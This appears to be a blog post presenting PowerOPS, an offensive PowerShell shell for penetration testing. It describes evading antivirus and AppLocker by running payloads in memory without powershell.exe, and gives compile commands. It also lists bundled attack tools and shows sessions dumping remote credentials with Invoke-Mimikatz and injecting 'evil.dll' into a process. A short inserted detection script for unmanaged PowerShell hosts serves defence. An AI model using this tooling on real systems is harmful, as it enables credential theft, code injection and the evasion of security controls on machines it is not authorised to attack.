PowerOps: making pentesting with PowerShell easier
It follows the KISS principle, keeping things as simple as possible. The main goal is to make it easy to use PowerShell offensively and to help evade antivirus and other mitigation solutions. This is done mainly in two ways:
- By not relying on powershell.exe, calling PowerShell directly through the .NET framework, which may help bypass security controls such as GPO, SRP and AppLocker.
- Payloads are executed from memory (base64-encoded strings) and never touch disk, evading most antivirus products.
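From the defender's side, a host that runs the PowerShell engine without powershell.exe still has to load System.Management.Automation.dll, and the engine still logs its start (Event ID 400 in the classic "Windows PowerShell" log) together with the HostApplication that loaded it. The script below is an added example, not part of PowerOPS or the original post; it surfaces both of those signals, and the list of known host names is an assumption to adjust per environment:

```powershell
# Added example (not PowerOPS code): find PowerShell engine hosts other than the standard
# interpreters. Run elevated so the module lists of other users' processes can be read.
function Get-UnmanagedPowerShellHost {
    [CmdletBinding()]
    param([string[]]$KnownHosts = @('powershell', 'powershell_ise', 'pwsh'))  # assumption
    foreach ($proc in Get-Process) {
        try {
            # .Modules throws for protected processes or a 32/64-bit mismatch; skip those.
            $engine = $proc.Modules |
                Where-Object { $_.ModuleName -like 'System.Management.Automation*.dll' }
        } catch { continue }
        if ($engine -and ($KnownHosts -notcontains $proc.ProcessName)) {
            [pscustomobject]@{
                ProcessName = $proc.ProcessName
                PID         = $proc.Id
                Path        = $proc.Path
                EngineDll   = ($engine | Select-Object -First 1).FileName
            }
        }
    }
}

function Get-NonStandardEngineStart {
    # Event ID 400 ("Engine state is changed from None to Available") records every engine
    # start and includes HostApplication=<path> even when the host is an in-memory loader.
    [CmdletBinding()]
    param([string[]]$KnownHosts = @('powershell.exe', 'powershell_ise.exe', 'pwsh.exe'),
          [int]$MaxEvents = 500)
    Get-WinEvent -LogName 'Windows PowerShell' -FilterXPath '*[System[EventID=400]]' `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            if ($_.Message -match 'HostApplication=(?<app>[^\r\n]+)') {
                $app = $Matches.app.Trim()
                # HostApplication may carry arguments; the first token is the executable
                # (heuristic: a quoted path with spaces would need extra parsing).
                $exe = [System.IO.Path]::GetFileName(($app -split '\s')[0]).ToLower()
                if ($KnownHosts -notcontains $exe) {
                    [pscustomobject]@{ Time = $_.TimeCreated; HostApplication = $app }
                }
            }
        }
}

Get-UnmanagedPowerShellHost | Format-Table -AutoSize
Get-NonStandardEngineStart  | Format-Table -AutoSize
```

Both checks are heuristics: a process list only catches hosts that are still running, and the engine-start event can be cleared, so they complement rather than replace script block logging.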
PowerOps is inspired by Cn33liz/p0wnedShell. PowerOps essentially offers an interactive PowerShell prompt with the PowerShell tools it bundles and, in addition, lets you run any valid PowerShell command.
Tools/functions it includes:
- PowerShellMafia/Powersploit
- Get-Keystrokes
- Invoke-DllInjection
- Invoke-Mimikatz
- Invoke-NinjaCopy
- Invoke-Shellcode
- Invoke-ReflectivePEInjection
- Invoke-TokenManipulation
- Invoke-WMICommand
- PowerUp
- PowerView
- Nishang
- Get-Information
- Get-PassHashes
- Port-Scan
- Auto-GPPPassword
- PowerCat
- Get-ProductKey
- Empire
To compile PowerOPS, import it into Microsoft Visual Studio or, if you don't have it, compile it as follows:
As an x86 binary:
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x86.exe /platform:x86 "C:\path\to\PowerOPS\PowerOPS\*.cs"
As an x64 binary:
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\username\PowerOPS_x64.exe /platform:x64 "C:\path\to\PowerOPS\PowerOPS\*.cs"
PowerOps uses the System.Management.Automation namespace, so make sure System.Management.Automation.dll is in the source path when compiling outside Visual Studio.
How to use it
Run the binary and type 'show' to see the available modules:
PS > show
[-] This computer is not part of a Domain! Some functions will not work!
[+] Nishang
Get-Information Get-PassHashes Port-Scan
[+] PowerSploit
Get-KeyStrokes Invoke-DllInjection Invoke-Mimikatz Invoke-NinjaCopy
Invoke-Shellcode Invoke-TokenManipulation Invoke-WmiCommand Invoke-ReflectivePEInjection
PowerView PowerUp
[+] Empire
Invoke-PsExec Invoke-SSHCommand
[+] Others
Auto-GPPPassword Get-ProductKey PowerCat
PS >
PowerUp and PowerView are loaded as modules, so use Get-Command -module to list all their available functions:
PS > get-command -module powerup
CommandType Name ModuleName
----------- ---- ----------
Function Find-DLLHijack PowerUp
Function Find-PathHijack PowerUp
Function Get-ApplicationHost PowerUp
Function Get-ModifiableFile PowerUp
Function Get-RegAlwaysInstallElevated PowerUp
Function Get-RegAutoLogon PowerUp
Function Get-ServiceDetail PowerUp
Function Get-ServiceFilePermission PowerUp
Function Get-ServicePermission PowerUp
Function Get-ServiceUnquoted PowerUp
Function Get-UnattendedInstallFile PowerUp
Function Get-VulnAutoRun PowerUp
Function Get-VulnSchTask PowerUp
Function Get-Webconfig PowerUp
Function Install-ServiceBinary PowerUp
Function Invoke-AllChecks PowerUp
Function Invoke-ServiceAbuse PowerUp
Function Invoke-ServiceDisable PowerUp
Function Invoke-ServiceEnable PowerUp
Function Invoke-ServiceStart PowerUp
Function Invoke-ServiceStop PowerUp
Function Restore-ServiceBinary PowerUp
Function Test-ServiceDaclPermission PowerUp
Function Write-HijackDll PowerUp
Function Write-ServiceBinary PowerUp
Function Write-UserAddMSI PowerUp
PS >
PowerOps is essentially a PowerShell shell with some modules and functions pre-loaded, so Get-Help also shows how to use the modules.
For example, to see how to use Invoke-Mimikatz:
PS > Get-Help Invoke-Mimikatz -examples
NAME
Invoke-Mimikatz
SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to
reflectively load Mimikatz completely in memory. This allows you to do
things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed
against multiple computers.
This script should be able to dump credentials from any version of Windows
through Windows 8.1 that has PowerShell v2 or higher installed.
Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog:
http://blog.gentilkiwi.com. Email: [email protected]. Twitter
@gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Version: 1.5
ReflectivePEInjection version: 1.1
Mimikatz version: 2.0 alpha (2/16/2015)
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Execute mimikatz on the local computer to dump certificates.
Invoke-Mimikatz -DumpCerts
-------------------------- EXAMPLE 2 --------------------------
C:\PS>Execute mimikatz on two remote computers to dump credentials.
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
-------------------------- EXAMPLE 3 --------------------------
C:\PS>Execute mimikatz on a remote computer with the custom command
"privilege::debug exit" which simply requests debug privilege and exits
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
PS >
Or simply view all the help available for Invoke-DllInjection:
PS > Get-Help Invoke-DllInjection -full
NAME
Invoke-DllInjection
SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>
[<CommonParameters>]
DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
PARAMETERS
-ProcessID <Int32>
Process ID of the process you want to inject a Dll into.
Required? true
Position? 1
Default value 0
Accept pipeline input? false
Accept wildcard characters? false
-Dll <String>
Name of the dll to inject. This can be an absolute or relative path.
Required? true
Position? 2
Default value
Accept pipeline input? false
Accept wildcard characters? false
<CommonParameters>
This cmdlet supports the common parameters: Verbose, Debug,
ErrorAction, ErrorVariable, WarningAction, WarningVariable,
OutBuffer, PipelineVariable, and OutVariable. For more information, see
about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216).
INPUTS
OUTPUTS
NOTES
Use the '-Verbose' option to print detailed information.
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
Description
-----------
Inject 'evil.dll' into process ID 4274.
RELATED LINKS
http://www.exploit-monday.com
PS >
Source: https://github.com/fdiskyou/PowerOPS
Via: www.hackplayers.com